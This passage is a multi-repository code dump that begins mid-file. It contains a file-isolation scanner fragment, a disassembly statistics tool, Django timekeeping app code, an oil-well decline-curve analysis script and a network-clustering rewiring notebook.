isolate_or_clear(args.file, f, iso_dir=args.iso_dir, safe_dir=args.safe_dir)
if args.dir:
for d in pathlib.Path(args.dir).glob("**/*"):
print(f"inspecting {d}")
if d.is_file():
f = bad.is_badfile(d)
print(f)
isolate_or_clear(d, f, iso_dir=args.iso_dir, safe_dir=args.safe_dir)
else:
print(f"{d} is a directory skipping.")
pass
if __name__ == "__main__":
main() # pragma: no cover
```
#### File: badfiles/badfiles/process_tar.py
```python
from functools import partial
from os import PathLike
from typing import Generator
def process_tar(f: PathLike, chunk: int = 512) -> Generator[bytes, None, None]:
"""A generator function that yields tar file headers.
Args:
        f (PathLike): The path to the tar file.
chunk (int, optional): The size of the tarfile chunks. Defaults to 512.
Yields:
Generator[bytes, None, None]: Tar file header(s).
"""
with open(f, "rb") as f:
for fh in iter(partial(f.read, chunk), b""):
try:
data = fh
# size = data.decode("ascii")[124:135]
# print(size)
if data.decode("ascii")[257:262] == "ustar" and data[125:135].isascii():
yield data
except (UnicodeDecodeError, ValueError):
pass
if __name__ == "__main__":
print([p for p in process_tar("./test/tar_dir.tar")])
```
|
{
"source": "Jeffallan/Obfuspy",
"score": 3
}
|
#### File: Jeffallan/Obfuspy/obfustat.py
```python
import argparse
from os import name
from typing import IO
import helpers
from pathlib import Path
from db import Base, create_db, Program, Function, Block, Instruction
from sqlalchemy.orm import sessionmaker
from pathlib import Path
def main() -> None:
# Data Collections
FUNC = helpers.FUNCTION_COLLECTION
PROG = helpers.PROGRAM_COLLECTION
BLOCK = helpers.BLOCK_COLLECTION
INST = helpers.INSTRUCTION_COLLECTION
# CLI Arguments
prs = argparse.ArgumentParser()
prs.add_argument(
"file", help="Parses the output of objdump -dwj .text {file}")
prs.add_argument(
"--llvm_blocks", help="The number of LLVM blocks", default=0)
prs.add_argument("--llvm_instructions",
help="The number of LLVM instructions", default=0)
prs.add_argument("--average_instructions",
help="The average number of LLVM instructions per block", default=0)
args = prs.parse_args()
# End CLI Arguments
engine = create_db(f"{args.file.split('/')[-1]}")
SESSION = sessionmaker(bind=engine)
session = SESSION()
size = helpers.get_size(args.file)
disassemble = helpers.disassemble_binary(args.file)
hexdump = helpers.make_raw_hex(args.file)
prog = PROG(name=Path(args.file).name,
llvm_blocks=args.llvm_blocks,
llvm_instructions=args.llvm_instructions,
average_instructions=args.average_instructions,
entropy=helpers.calculate_entropy(hexdump),
raw_hex=hexdump,
size=size)
program = (Program(name=prog.name,
llvm_blocks=prog.llvm_blocks,
llvm_instructions=prog.llvm_instructions,
average_instructions=prog.average_instructions,
entropy=prog.entropy,
raw_hex=prog.raw_hex,
size=prog.size))
session.add(program)
session.commit()
# Lists for storing information about the functions, blocks, and instructions
FUNCTIONS = []
INSTRUCTIONS = []
BLOCKS = []
helpers._check_newline(disassemble)
with open(disassemble) as inf:
header = False
func_name = ""
func_instructions = 0
jump_instructions = 0
block_count = 0
block_instructions = 0
block_name = ""
for i in inf:
function = helpers._is_func(i)
if function:
header = True
func_instructions = 0
func_name = (function.group(0).translate(
str.maketrans({"<": "", ">": "", ":": ""})))
func_1 = (Function(name=func_name,
program_id=program.id,
instruction_count=0,
jump_count=0,
blocks=0,
average_block_size=0))
session.add(func_1)
session.commit()
if block_count == 0:
block_name = f"{func_name}_block_{block_count}"
blk_1 = (Block(name=block_name,
function_id=func_1.id,
instruction_count=0))
session.add(blk_1)
session.commit()
elif header:
block_name = f"{func_name}_block_{block_count}"
# Checks to see if we are still inside the function
if i[0] == " ":
# accumulate instructions for function level count
if helpers._is_jump(i):
jump_instructions += 1
block_instructions += 1
block = BLOCK(name=block_name,
function=func_name,
instruction_count=block_instructions)
BLOCKS.append(block)
b = session.query(Block).get(blk_1.id)
b.instruction_count=block.instruction_count
session.commit()
blk_1 = (Block(name=block.name,
function_id=func_1.id,
instruction_count=block.instruction_count))
session.add(blk_1)
session.commit()
block_count = block_count+1
block_instructions = 0
else:
block_instructions += 1
func_instructions += 1
# accumulate instructions
# Parse line with \t delimiter
split = i.split("\t")
if len(split) > 2:
el = split[2].split()
# print(el)
if len(el) > 1:
op = " ".join(el).replace("\n", "")
else:
op = None
inst = INST(block=block_name,
name=el[0],
offset=split[0].strip().replace(":", ""),
bytes=split[1].strip(),
op=op)
INSTRUCTIONS.append(inst)
i = (Instruction(name=inst.name,
block_id=blk_1.id,
offset=inst.offset,
byte_str=inst.bytes,
op=inst.op))
session.add(i)
session.commit()
# To catch a null byte
else:
inst = INST(block=block_name,
name="NULL BYTE",
offset=split[0].strip().replace(":", ""),
bytes=split[1].strip(),
op=None)
INSTRUCTIONS.append(inst)
i = (Instruction(name=inst.name,
block_id=blk_1.id,
offset=inst.offset,
byte_str=inst.bytes,
op=inst.op))
session.add(i)
session.commit()
# Checks for newline that separates functions in objdump
elif len(i) <= 1:
block = BLOCK(name=block_name,
function=func_name,
instruction_count=block_instructions)
if block.instruction_count > 0:
BLOCKS.append(block)
blk_2 = session.query(Block).get(blk_1.id)
blk_2.instruction_count = block.instruction_count
session.commit()
# Add function to function collection
f = FUNC(name=func_name,
program=prog.name,
instruction_count=func_instructions,
jump_count=jump_instructions,
blocks=block_count)
FUNCTIONS.append(f)
func_2 = session.query(Function).get(func_1.id)
func_2.instruction_count = f.instruction_count
func_2.jump_count = f.jump_count
func_2.blocks = f.blocks
func_2.average_block_size = f.instruction_count / f.blocks
session.commit()
# Reset global variables
header = False
func_instructions = 0
jump_instructions = 0
block_count = 1
block_instructions = 0
print(
f"Analysis of {prog.name}\n\tSize Bytes:\t{prog.size}\n\tEntropy:\t{prog.entropy}")
print(f"\nFunctions:\n")
for f in FUNCTIONS:
print(
f"Name: {f.name}\n\tInstructions: {f.instruction_count}\n\tJumps: {f.jump_count}\n\tBlocks: {f.blocks}")
for i in INSTRUCTIONS:
print(
f"\n\t\tName: {i.name}\n\t\tBlock: {i.block}\n\t\tOffset: {i.offset}\n\t\tBytes: {i.bytes}\n\t\tOperation: {i.op}")
for b in BLOCKS:
print(
f"Block:\n\t\tName: {b.name}\n\t\tMember: {b.function}\n\t\tInstructions: {b.instruction_count}")
# print(prog.name)
# program = (Program(name=prog.name,
# llvm_blocks=prog.llvm_blocks,
# llvm_instructions=prog.llvm_instructions,
# average_instructions=prog.average_instructions,
# entropy=prog.entropy,
# raw_hex=prog.raw_hex,
# size=prog.size))
# session.add(program)
# session.commit()
#for f in FUNCTIONS:
# f = (Function(name=f.name,
# program_id=program.id,
# instruction_count=f.instruction_count,
# jump_count=f.jump_count,
# blocks=f.blocks,
# average_block_size=f.instruction_count / f.blocks))
# session.add(f)
# session.commit()
#for b in BLOCKS:
#if b.function == f.name:
# b = (Block(name=b.name,
# function_id=f.id,
# instruction_count=b.instruction_count))
# session.add(b)
# session.commit()
# for i in INSTRUCTIONS:
#if i.block == b.name:
# i = (Instruction(name=i.name,
# block_id=b.id,
# offset=i.offset,
# byte_str=i.bytes,
# op=i.op))
# session.add(i)
# session.commit()
if __name__ == "__main__":
main()
```
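Since obfustat.py persists everything it parses through the SQLAlchemy models imported from db (not shown in this dump), the resulting database can be queried back afterwards. A sketch, assuming create_db simply returns an engine bound to the SQLite file for the named binary:
```python
from sqlalchemy.orm import sessionmaker
from db import create_db, Program, Function

engine = create_db('a.out')  # binary name used in a previous obfustat.py run
session = sessionmaker(bind=engine)()

for prog in session.query(Program):
    print(prog.name, prog.size, prog.entropy)
    for func in session.query(Function).filter_by(program_id=prog.id):
        print('  ', func.name, func.instruction_count, func.jump_count, func.blocks)
```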
|
{
"source": "Jeffallan/timekeeper",
"score": 2
}
|
#### File: management/commands/gen_clients.py
```python
from django.core.management.base import BaseCommand
from django.db import models, transaction
from typing import Any, Optional
from api.apps.clients.factory import Client, Location
import api.apps.clients.models as models
CLIENT = 5
LOCATION = 5
class Command(BaseCommand):
help = "Generates test data for clients and locations."
models = [Client, Location]
@transaction.atomic
def handle(self, *args: Any, **options: Any) -> Optional[str]:
self.stdout.write("Creating test data.")
self.stdout.write("Creating clients.")
models.Client.objects.all().delete()
for _ in range(CLIENT):
client = Client()
#self.stdout.write("Creating locations.")
#for _ in range(LOCATION):
# loc = Location()
```
#### File: apps/core/permissions.py
```python
from rest_framework import permissions
class IsUserOrReadOnly(permissions.BasePermission):
"""
Object-level permission to only allow owners of an object to edit it.
"""
def has_object_permission(self, request, view, obj):
if request.method in permissions.SAFE_METHODS:
return True
if request.user.is_staff:
return True
return obj == request.user
class IsAdmin(permissions.BasePermission):
def has_permission(self, request, view):
return request.user.role == 1
class IsStaff(permissions.BasePermission):
def has_permission(self, request, view):
return request.user.role == 2
class IsUser(permissions.BasePermission):
def has_permission(self, request, view):
return request.user.role == 3
```
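These permission classes plug into DRF views in the usual way; a hypothetical viewset (the class and its omitted queryset are illustrative, not part of this app) could combine them like this:
```python
from rest_framework import viewsets
from api.apps.core.permissions import IsAdmin, IsUserOrReadOnly

class ExampleViewSet(viewsets.ModelViewSet):
    """Hypothetical viewset: admins get full access, everyone else gets
    read-only access plus writes to their own user object."""
    permission_classes = [IsAdmin | IsUserOrReadOnly]
    # queryset and serializer_class omitted; this only shows the wiring
```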
#### File: apps/core/validators.py
```python
from django.core.exceptions import ValidationError
from django.utils.translation import gettext_lazy as _
from decimal import Decimal
def validate_duration(value):
    if value < Decimal(0.25):
raise ValidationError(
            _('%(value)s Minimum billable time is 15 min.'),
params={'value': value},
)
if value >= Decimal(24.0):
raise ValidationError(
_('%(value)s Submission exceeds maximum.'),
params={'value': value},
)
```
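validate_duration is meant to hang off a model or serializer field. A hypothetical model field using it (the model itself is not part of this app) might look like:
```python
from django.db import models
from api.apps.core.validators import validate_duration

class ExampleEntry(models.Model):
    """Hypothetical model: duration is billed in hours and must stay
    between 15 minutes and 24 hours."""
    duration = models.DecimalField(max_digits=4, decimal_places=2,
                                   validators=[validate_duration])
```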
#### File: apps/services/factory.py
```python
from api.apps.services.models import Service
from api.apps.users.models import User
import factory
from factory.django import DjangoModelFactory
from datetime import datetime
import random
from api.apps.users.factory import active_choice
from api.apps.core.util.services import ServiceChoices
class ServiceFactory(DjangoModelFactory):
class Meta:
model = Service
name = factory.Faker("job")
service_unit = random.choice([x.name for x in ServiceChoices])
is_duration = factory.LazyFunction(active_choice)
@factory.post_generation
def approved_providers(self, create, extracted, **kwargs):
if not create:
return
if extracted:
for provider in extracted:
self.providers.add(provider)
```
#### File: apps/work/factory.py
```python
from factory.base import Factory
from api.apps.work.models import WorkPerformed
import factory
from factory.django import DjangoModelFactory
import random
from api.apps.users.models import User
from api.apps.services.models import Service
from api.apps.clients.models import Location
class WorkFactory(DjangoModelFactory):
class Meta:
model = WorkPerformed
service_date = factory.Faker("date_this_decade")
start_time = factory.Faker("time")
stop_time = factory.Faker("time")
billed = factory.Faker("boolean")
location = factory.Iterator(Location.objects.all())
provider = factory.Iterator(User.objects.all())
service = factory.Iterator(Service.objects.all())
units = random.uniform(1.00, 24.00)
"""
@factory.post_generation
def location(self, create, extracted, **kwargs):
if not create:
return
if extracted:
for e in extracted:
self.location.add(e)
@factory.post_generation
def provider(self, create, extracted, **kwargs):
if not create:
return
if extracted:
for e in extracted:
self.provider.add(e)
@factory.post_generation
def service(self, create, extracted, **kwargs):
if not create:
return
if extracted:
for e in extracted:
self.service.add(e)
"""
```
#### File: apps/work/views.py
```python
from rest_framework import viewsets
from .models import WorkPerformed
from .serializers import WorkPerformedSerializer
from api.apps.users.models import User
from dry_rest_permissions.generics import DRYPermissions
class WorkPerformedViewSet(viewsets.ModelViewSet):
queryset = WorkPerformed.objects.all()
serializer_class = WorkPerformedSerializer
permission_classes = [DRYPermissions,]
def get_queryset(self):
if self.request.user.role == 1:
return WorkPerformed.objects.all()
return WorkPerformed.objects.filter(provider=self.request.user.id)
```
|
{
"source": "Jeffalltogether/well_decline_curve_analysis",
"score": 3
}
|
#### File: Jeffalltogether/well_decline_curve_analysis/wellAnalysis.py
```python
import sys
sys.path.append('./utils/')
import os, math
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib
from geopy.distance import vincenty
# import tools and custom code
from tools import load_merge_header_and_production_csv, swap_production_dates_for_time_delta
from tools import current_selection, decline_curve, handle_numerical_variables, handle_dateTime_variables
from tools import handle_object_variables, plot_map, fit_decline_curve, add_BOE_per_day_column, nominal_decline
def main(headerCSV, productionCSV):
analysis = Quick_TypeCurve_Analysis(headerCSV, productionCSV)
print '\n********************************************************************************'
print '* *'
print '* Well Type Curve Analysis *'
print '* *'
print '* Quit this program anytime by pressing `ctrl+C` *\n'
print 'reading well header data from: %s' %headerCSV
print 'reading production data from: %s' %productionCSV
# select by well number
print '\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n'
wellByName = raw_input ('would you like to select individual wells by API-UWI number? [y/n]: ')
# check user input
while wellByName not in ('y', 'n', 'Y', 'N'):
wellByName = raw_input('please try again [y/n]? ')
if wellByName == 'y' or wellByName == 'Y':
analysis.subset_by_well_name()
# select nearby wells with a circular radius
print '\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n'
wellByName = raw_input ('would you like to select wells near a GPS location? [y/n]: ')
# check user input
while wellByName not in ('y', 'n', 'Y', 'N'):
wellByName = raw_input('please try again [y/n]? ')
if wellByName == 'y' or wellByName == 'Y':
analysis.subset_wells_by_distance()
# select by variable ranges
print '\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n'
wellByVariable = raw_input ('would you like to subset wells by column values? [y/n]: ')
# check user input
while wellByVariable not in ('y', 'n', 'Y', 'N'):
wellByVariable = raw_input('please try again [y/n]? ')
if wellByVariable == 'y' or wellByVariable == 'Y':
analysis.subset_well_by_variable()
# plot type curve for all selected wells
print '\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n'
b_value = None
# determine if user wants to pre-specify any of the decline curve parameters
fixed_b = raw_input ('would you like to pre-specify the decline curve b-factor? [y/n]: ')
# check user input
while fixed_b not in ('y', 'n', 'Y', 'N'):
fixed_b = raw_input('please try again [y/n]? ')
if fixed_b.upper() == 'Y':
while True:
try:
b_value = float(raw_input('Enter value for b-factor: '))
except ValueError:
print 'Please enter a number'
continue
else:
break
analysis.generate_type_curve(b_value)
# plot map
print '\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n'
analysis.map_selected_wells()
# save csv
print '\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n'
analysis.save_selected_data()
# plot wells individually
print '\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n'
analysis.plot_individual_wells_and_type_curves()
return
class Quick_TypeCurve_Analysis(object):
'''
Type curve analysis based on Jessica's work.
Decline curve estimates from a python module available at:
http://www.uky.edu/KGS/emsweb/devsh/production/decline_obj.py
'''
def __init__(self, headerCSV, productionCSV):
self.wellDF = load_merge_header_and_production_csv(headerCSV, productionCSV)
self.wellDF = add_BOE_per_day_column(self.wellDF)
self.userLocation = []
def subset_wells_by_distance(self):
# obtain longitude and latitudes from user
while len(self.userLocation) != 2:
while True:
try:
self.userLocation = raw_input('\nDefine the center of your radius in Latitude (WGS84), and Longitude (WGS84) (separate by comma): ')
self.userLocation = [x.strip() for x in self.userLocation.split(',')]
self.userLocation = [float(x) for x in self.userLocation]
except ValueError:
print 'Please enter numbers'
continue
else:
break
# obtain the selection radius from user
while True:
try:
userRadius = float(raw_input('\nDefine the radius within which you will keep all nearby wells (in miles): '))
except ValueError:
print 'Please enter numbers'
continue
else:
break
# add vicinity column to data set
dist = np.zeros(len(self.wellDF['API/UWI']))
for i,(lat,lon) in enumerate(zip(self.wellDF['Surface Latitude (WGS84)'], self.wellDF['Surface Longitude (WGS84)'])):
dist[i] = vincenty([lat, lon], self.userLocation).miles
self.wellDF['vicinity'] = dist
# keep only wells within the user selected radius
self.wellDF = self.wellDF.loc[self.wellDF['vicinity'] <= userRadius]
# notify user of changes to current selection
print '%i wells selected' %(len(set(self.wellDF['API/UWI'])))
return
def subset_by_well_name(self):
allWells = list(set(self.wellDF['API/UWI']))
print '\nSelect one or more of the following wells by API/UWI number\n'
print 'all wells available...'
for i,well in enumerate(allWells):
print '%i -- %s' %(i, well)
selection = raw_input('well selection [separate by commas]:\n')
selectionList = [x.strip() for x in selection.split(',')]
self.wellDF = self.wellDF[self.wellDF['API/UWI'].isin(selectionList)]
current_selection(self.wellDF)
# notify user of changes to current selection
print '%i wells selected' %(len(set(self.wellDF['API/UWI'])))
return
def subset_well_by_variable(self):
allVariables = self.wellDF.columns.values
print '\nSelect one or more of the following variables\n'
print 'all variables available...'
# generate dictionary of variables
variableDict = dict()
for i,var in enumerate(allVariables):
print '%i -- %s' %(i, var)
variableDict.update({i:var})
selectedVars = []
while len(selectedVars) == 0:
try:
selection = raw_input('Select the variables by their number [separate multiple selections by commas]:\n')
selectionList = [x.strip() for x in selection.split(',')]
selectedVars = [variableDict.get(int(key)) for key in selectionList]
except ValueError:
print 'Please enter variables by their number'
continue
else:
break
print 'you selected the following variables: '
print selectedVars
for colName in selectedVars:
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print '\nthe variable \"%s\" is of type \"%s\"' %(colName, self.wellDF[colName].dtypes)
if str(self.wellDF[colName].dtypes) in ['float64', 'int64']:
self.wellDF = handle_numerical_variables(self.wellDF, colName)
elif str(self.wellDF[colName].dtypes) in ['object']:
self.wellDF = handle_object_variables(self.wellDF, colName)
elif str(self.wellDF[colName].dtypes) in ['datetime64', 'timedelta[ns]','datetime64[ns]']:
self.wellDF = handle_dateTime_variables(self.wellDF, colName)
else:
print 'data type not recognized, skipping variable'
continue
# notify user of changes to current selection
print '%i wells selected' %(len(set(self.wellDF['API/UWI'])))
return
def generate_type_curve(self, b_value = None):
# get time delta column from selected wells
self.wellDF = swap_production_dates_for_time_delta(self.wellDF)
# estimated decline curve parameters
qi, b, di, r2 = fit_decline_curve(self.wellDF, fixed_b_factor = b_value)
d_nominal = nominal_decline(qi, b, di)
# times to estimate for the plot in int(days)
time_0 = 0
time_n = np.timedelta64(self.wellDF['Time Delta'].max())
decline_t = np.arange(time_0, time_n, np.timedelta64(10,'D'))
decline_t = (decline_t / np.timedelta64(1, 'D')).astype(int)
# estimated decline curve
decline_y = decline_curve(decline_t, qi, b, di)
# plot well data
fig, ax = plt.subplots(figsize = (15,8))
for API in set(self.wellDF['API/UWI']):
plotData = self.wellDF.loc[self.wellDF['API/UWI'] == API, ['Time Delta', 'BOE per day']]
days = plotData['Time Delta'].dt.days
liquid = np.array(plotData['BOE per day'])
ax.semilogy(days, liquid, '-', label = API)
# add decline estimate
ax.plot(decline_t, decline_y, '-', color='black', linewidth=5.0, label = 'Estimated Decline')
# set axis limits
xmin = (self.wellDF['Time Delta'].min() / np.timedelta64(1, 'D')).astype(int)
xmin = xmin*0.15
xmax = (self.wellDF['Time Delta'].max() / np.timedelta64(1, 'D')).astype(int)
xmax = xmax*1.06
ax.set_xlim([xmin, xmax])
# add titles and legend
ax.set_xlabel('Time [Days]')
ax.set_ylabel('BOE per Day\n[Barrels of Oil Equivalent per Day]')
ax.set_title('Decline Curve Parameters: qi=%.2f, b=%.4f, nominal decline rate=%.1f, r2=%.3f' %(qi, b, d_nominal, r2))
num_col = math.ceil(len(set(self.wellDF['API/UWI']))/40.0) # number of columns to put in legend
num_col = int(num_col)
ax.legend(bbox_to_anchor=(1.26, 0.9), ncol = num_col, fontsize = 9-num_col, labelspacing=0.2)
# Customize the major grid
ax.grid(which='major', linestyle='-', linewidth='0.5', color='grey')
# Customize the minor grid
ax.grid(which='minor', linestyle=':', linewidth='0.5', color='grey')
# eliminate unnecessary white space
plt.subplots_adjust(left=0.07, right=0.8, top=0.9, bottom=0.1)
# save and display plot
plt.savefig('./results/Average_decline_estimate.png')
plt.close()
return
def map_selected_wells(self):
print 'generating map, this may take a minute...'
# send data to mapping function
if not(self.userLocation):
plot_map(self.wellDF)
else:
plot_map(self.wellDF, self.userLocation)
return
def save_selected_data(self):
print 'saving selected wells to .csv'
self.wellDF.to_csv('./results/selected_wells.csv')
return
def plot_individual_wells_and_type_curves(self):
print 'generating plots for all selected wells'
# get time delta column from selected wells
self.wellDF = swap_production_dates_for_time_delta(self.wellDF)
declineFit = []
for well in np.unique(self.wellDF['API/UWI']):
print 'fitting well # %s' %(str(well))
wellData = self.wellDF[self.wellDF['API/UWI'] == well]
# estimated decline curve parameters
qi, b, di, r2 = fit_decline_curve(wellData)
# compute Nominal decline
d_nominal = nominal_decline(qi, b, di)
# add data to list for saving to excel
declineFit.append([well, qi, b, d_nominal, di, r2])
# times to estimate for the plot in int(days)
time_0 = 0
time_n = np.timedelta64(wellData['Time Delta'].max())
decline_t = np.arange(time_0, time_n, np.timedelta64(10,'D'))
decline_t = (decline_t / np.timedelta64(1, 'D')).astype(int)
# estimated decline curve
decline_y = decline_curve(decline_t, qi, b, di)
# plot well data
fig, ax = plt.subplots(figsize = (15,8))
days = wellData['Time Delta'].dt.days
liquid = np.array(wellData['BOE per day'])
ax.semilogy(days, liquid, 'o-', label = well)
# add decline estimate
ax.plot(decline_t, decline_y, '-', color='black', linewidth=5.0, label = 'Estimated Decline')
# set axis limits
xmin = (wellData['Time Delta'].min() / np.timedelta64(1, 'D')).astype(int)
xmin = xmin*0.15
xmax = (wellData['Time Delta'].max() / np.timedelta64(1, 'D')).astype(int)
xmax = xmax*1.06
ax.set_xlim([xmin, xmax])
# add titles and legend
ax.set_xlabel('Time [Days]')
ax.set_ylabel('BOE per Day\n[Barrels of Oil Equivalent per Day]')
ax.set_title('Decline Curve Parameters: qi=%.2f, b=%.4f, nominal decline rate=%.1f, r2=%.3f' %(qi, b, d_nominal, r2))
ax.legend(bbox_to_anchor=(1.28, 1.05))
# Customize the major grid
ax.grid(which='major', linestyle='-', linewidth='0.5', color='grey')
# Customize the minor grid
ax.grid(which='minor', linestyle=':', linewidth='0.5', color='grey')
# eliminate unnecessary white space
plt.subplots_adjust(left=0.07, right=0.8, top=0.9, bottom=0.1)
# save and display plot
plt.savefig('./results/' + str(well) + '_decline_estimate.png')
plt.close()
declineFitDF = pd.DataFrame(declineFit, columns = ['API/UWI', 'qi', 'b', 'nominal decline rate', 'effective decline rate[di]', 'r2'])
declineFitDF.to_csv('./results/individual_well_decline_curves.csv')
return
if __name__ == '__main__':
### well data files
headerCSV = './data/Well_header_data.csv'
productionCSV = './data/Production_Time_Series.CSV'
main(headerCSV, productionCSV)
```
|
{
"source": "jeffalstott/network_clustering_growth",
"score": 3
}
|
#### File: network_clustering_growth/MRC_Notebook/Clean_Implementation.py
```python
%matplotlib inline
# <codecell>
from pylab import *
# <markdowncell>
# Define the algorithm
# ====
# <codecell>
import networkx as nx
# def one_move(g,A2):
# doorway = find_doorway(g,A2)
# hinge, target, latch = find_door(g,A2,doorway)
# swing_door(g, hinge, target, latch)
# return g, hinge, target, latch
def one_move(g,A2):
most_wedges_order = argsort(A2.ravel())[::-1]
doorways = array(unravel_index(most_wedges_order, shape(A2)))
for doorway_index in range(doorways.shape[1]):
doorway = tuple(doorways[:,doorway_index])
if g.has_edge(*doorway): #There's already an edge there
continue
if doorway[0]==doorway[1]: #The proposed target is a self link
continue
door = find_door(g, doorway, A2)
if door:
hinge, target, latch = door
g = swing_door(g, hinge, target, latch)
return g, hinge, target, latch
return None
def find_door(g, doorway, A2):
wedges_across_doorway = A2[doorway]
neighbors_wedges = A2[array(doorway)]
neighbors_least_wedges_order = argsort(neighbors_wedges.ravel())
candidate_doors = array(unravel_index(neighbors_least_wedges_order, shape(neighbors_wedges)))
for candidate_door_index in range(candidate_doors.shape[1]):
side_of_door_with_hinge, target_neighbor = candidate_doors[:,candidate_door_index]
hinge = doorway[side_of_door_with_hinge]
latch = doorway[not side_of_door_with_hinge]
wedges_across_candidate_door_position = A2[hinge, target_neighbor]
#We want to complete more wedges than we open. So if the wedges across the doorway is less
#than those across the current door (all of which are currently triangles), then we don't
#want to make this move.
if wedges_across_doorway<=wedges_across_candidate_door_position:
return None
#Because the wedges_across_candidate_door_position is sorted from low to high, if
#we meet this condition once, then we know the rest of the candidate door positions will
#be even worse, so we should stop
if (g.has_edge(hinge,target_neighbor) and
g.degree(target_neighbor) > g.degree(latch) and
not g.edge[hinge][target_neighbor]['fixed']):
return hinge, target_neighbor, latch
return None
def swing_door(g, hinge, target_neighbor, latch):
g.remove_edge(hinge, target_neighbor)
g.add_edge(hinge, latch, fixed=True)
return g
def nt_np(G):
triangles=0 # 6 times number of triangles
contri=0 # 2 times number of connected triples
for v,d,t in nx.algorithms.cluster._triangles_and_degree_iter(G):
contri += d*(d-1)
triangles += t
if triangles==0: # we had no triangles or possible triangles
return 0.0, float(contri)
else:
return triangles/6.0, float(contri)/2.0
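# Note: nt_np returns (#triangles, #connected triples); their ratio nt/np, used below as
# the "total clustering" measure, is the triangle density, i.e. one third of the usual
# transitivity 3*triangles/triples.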
# <markdowncell>
# Create the initial graph
# ===
# <codecell>
n_nodes = 100
p = 1.5*log(n_nodes)/n_nodes
g = nx.erdos_renyi_graph(n=n_nodes, p=p)
original_graph = g.copy()
try_count = 1
max_tries = 1000
while not nx.is_connected(g):
g = nx.erdos_renyi_graph(n=n_nodes, p=p)
try_count += 1
if try_count>max_tries:
print("Can't make a connected graph. Tried %i times."%max_tries)
break
print("Average degree: %.2f"%mean(list(g.degree().values())))
# <markdowncell>
# Get initial measurements of the original graph
# ====
# <codecell>
nt, np = nt_np(g)
A = nx.adjacency_matrix(g).todense()
A2 = A**2
change_percentage = 1
n_trials = floor(change_percentage*g.number_of_edges())
Cs = [nt/np]
C_locals = [nx.average_clustering(g)]
mean_k = [mean(list(g.degree().values()))]
pl = [nx.average_shortest_path_length(g)]
initial_degrees = g.degree().values()
# <markdowncell>
# Rewire the graph
# ===
# <codecell>
for i,j in g.edges_iter():
g[i][j]['fixed'] = False
print("Attempting %i edge rewires, out of %i edges"%(n_trials, g.number_of_edges()))
for k in arange(n_trials):
#print k
if not k%10:
print("Rewiring %i out of %i"%(k,n_trials))
# A2 = array(A2)
# fill_diagonal(A2, 0)
outputs = one_move(g, array(A2))
if not outputs:
print("Couldn't make a move!")
break
else:
g, hinge, x, y = outputs
w = A2[hinge, y]
t = A2[hinge, x]
#nt = nt + w - t
#np = np + g.degree(y) - g.degree(x) + 1
nt, np = nt_np(g)
A = nx.adjacency_matrix(g).todense()
A2 = A**2
### This is a purported speedup that causes the algorithm to break for some reason
# Anew = nx.adjacency_matrix(g).todense()
# N = Anew-A
# A2 = A2 + Anew*N + N*Anew + N**2
# A = Anew
### Or maybe something like this?
# N = zeros(shape(A))
# N[hinge,x] = N[x, hinge] = 1
# N[hinge,y] = N[y, hinge] = -1
# A2 = A2 + AN + NA + N**2
mean_k.append(mean(list(g.degree().values())))
Cs.append(nt/np)
pl.append(nx.average_shortest_path_length(g))
C_locals.append(nx.average_clustering(g))
print("Rewired %.1f percent of edges"%(100*float(k)/n_trials))
end_degrees = g.degree().values()
rewired_graph = g.copy()
# <markdowncell>
# Measure the graph's properties during rewiring
# ====
# <codecell>
Cs = array(Cs)
C_locals = array(C_locals)
plot(arange(k+1)/k,Cs/Cs[0], color='b', label="Total (Triangle Density)")
plot(arange(k+1)/k, C_locals/C_locals[0], color='r', label="Avg. Local")
ylabel("Clustering Increase From Initial")
title("Clustering Goes Up, With Two Definitions")
xlabel("Percent of Rewirings")
lg = legend(loc=4)
lg.draw_frame(False)
ax = gca()
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
savefig("Model-Clustering_Increases.pdf")
# <codecell>
Cs = array(Cs)
pl = array(pl)
plot(arange(k+1)/k,Cs/Cs[0], color='b', label="Clustering")
ylabel("Total Clustering", color='b')
xlabel("Percent of Rewirings")
ax = gca()
ax.spines['top'].set_visible(False)
ax.get_xaxis().tick_bottom()
twinx()
plot(arange(k+1)/k, pl/pl[0], color='r', label="Average Path Length")
ylabel("Average Path Length", color='r')
title("Path Length Also Increases, Though More Slowly")
ax = gca()
ax.spines['top'].set_visible(False)
ax.get_xaxis().tick_bottom()
savefig("Model-Clustering_vs_Path_Length.pdf")
# <codecell>
Gamma = Cs/Cs[0]
Lambda = pl/pl[0]
swi = Gamma/Lambda
f = figure()
ax = f.add_subplot(1,1,1)
x = arange(k+1)/k
plot(x,swi)
text(.7, .5, "Clustering / Path Length,\nCompared to Initial", transform=ax.transAxes, horizontalalignment='center')
ylabel("Small World Index")
xlabel("Percent of Rewirings")
title("Small World Index Grows with Rewiring, then Plateaus")
ax = gca()
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
savefig("Model-Small_World_Index.pdf")
# <codecell>
hist(list(initial_degrees), label='Initial', normed=True)
hist(list(end_degrees), alpha=.8, label='After Rewiring', normed=True)
legend()
title("Degree Distribution Changes With Rewiring")
ylabel("p(Degree)")
xlabel("Degree")
lg = legend()
lg.draw_frame(False)
ax = gca()
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
savefig("Model-Degree_Distribution.pdf")
# <markdowncell>
# Visualize the graph before and afterward
# ===
# <codecell>
figure()
nx.draw(original_graph)
title("Original Graph")
figure()
nx.draw(rewired_graph)
title("Rewired Graph")
# <markdowncell>
# Interactive visualization
# ===
